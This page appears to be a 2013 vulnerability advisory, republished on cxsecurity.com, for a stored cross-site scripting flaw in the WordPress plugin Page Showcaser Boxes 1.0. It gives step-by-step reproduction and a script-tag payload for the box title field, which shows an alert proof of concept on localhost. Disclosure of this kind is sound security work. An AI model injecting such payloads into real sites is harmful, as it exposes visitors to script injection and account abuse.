WordPress Page Showcaser Boxes 1.0 Cross Site Scripting

2013.09.19
Credit: Arsan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: WordPress Page Showcaser Boxes 1.0 Cross Site Scripting # Date: 2013 18 September # Author: Arsan # Vendor Homepage: http://wordpress.org/plugins/page-showcaser-boxes/ # Version : 1.0 # Tested on: Linux & Windows # Category: webapps # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] Description : # # 1) Download "Page Showcaser Boxes" And Install # 2) Create New Box ~> Follow this link : # http://localhost/wp/wp-admin/post-new.php?post_type=showcaserboxe # 3) Insert In Title This Code And Publish : # "><script>alert(/Arsan/)</script> # 4) And Try To See Your Page; Follow Link : # http://localhost/wp/?post_type=showcaserboxe&p=[Number Post] # Or # http://localhost/wp/?showcaserboxe=alertarsan # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

References:

http://wordpress.org/plugins/page-showcaser-boxes/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top